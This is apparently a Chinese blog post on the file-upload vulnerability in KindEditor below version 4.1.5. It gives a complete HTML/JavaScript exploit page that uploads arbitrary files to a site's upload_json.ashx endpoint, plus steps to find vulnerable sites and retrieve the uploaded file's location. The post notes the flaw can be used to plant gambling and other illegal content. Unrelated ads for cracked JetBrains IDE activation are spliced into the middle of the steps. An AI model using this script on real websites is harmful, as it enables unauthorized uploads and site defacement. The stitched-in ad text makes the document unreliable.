kindeditor编辑器文件上传漏洞-pdf.js漏洞

kindeditor编辑器文件上传漏洞kindeditor编辑器版本小于4.1.5存在文件上传漏洞，可利用该漏洞上次网页、文本文件，可网站进行篡改，添加赌博、**等违法信息。通过扫描器发现该网站存在编辑器。通过浏览器访问，确定该编辑器为kindeditor编辑器。确定该编辑器的版本小于4.1.5，存在文件上传漏洞。构造文件上传漏洞利用脚本kindeditor.html。<html><head><title>Uploader</title><s

kindeditor编辑器版本小于4.1.5存在文件上传漏洞，可利用该漏洞上次网页、文本文件，可网站进行篡改，添加赌博、**等违法信息。

通过扫描器发现该网站存在编辑器。

通过浏览器访问，确定该编辑器为kindeditor编辑器。

确定该编辑器的版本小于4.1.5，存在文件上传漏洞。

构造文件上传漏洞利用脚本kindeditor.html。

<html><head> <title>Uploader</title> <script src="https://url/editor/kindeditor.js"></script> <script> KindEditor.ready(function(K) { var uploadbutton = K.uploadbutton({ button : K('#uploadButton')[0], fieldName : 'imgFile', url : 'https://url/editor/asp.net/upload_json.ashx?dir=file', afterUpload : function(data) { if (data.error === 0) { var url = K.formatUrl(data.url, 'absolute'); K('#url').val(url);} }, }); uploadbutton.fileBox.change(function(e) { uploadbutton.submit(); }); }); </script></head><body> <p > <input  type="text"  value="" readonly="readonly" /> <input type="button"  value="Upload" /> </p> </body> </html>

是否还在为Ide开发工具频繁失效而烦恼，来吧关注以下公众号获取最新激活方式。亲测可用！

为防止网络爬虫，请关注公众号回复”口令”

激活idea 激活CLion DataGrip DataSpell dotCover dotMemory dotTrace GoLand PhpStorm PyCharm ReSharper ReShaC++ Rider RubyMine WebStorm 全家桶 解锁下载刷新

【正版授权，激活自己账号】：Jetbrains全家桶Ide使用，1年售后保障，每天仅需1毛

【官方授权 正版激活】：官方授权 正版激活 自己使用，支持Jetbrains家族下所有IDE…

本地打开构建好的html文件

利用漏洞利用脚本上传测试文件uptext.txt，并使用工具抓取数据包。

在返回包中获取到文件上传位置，并使用浏览器成功访问。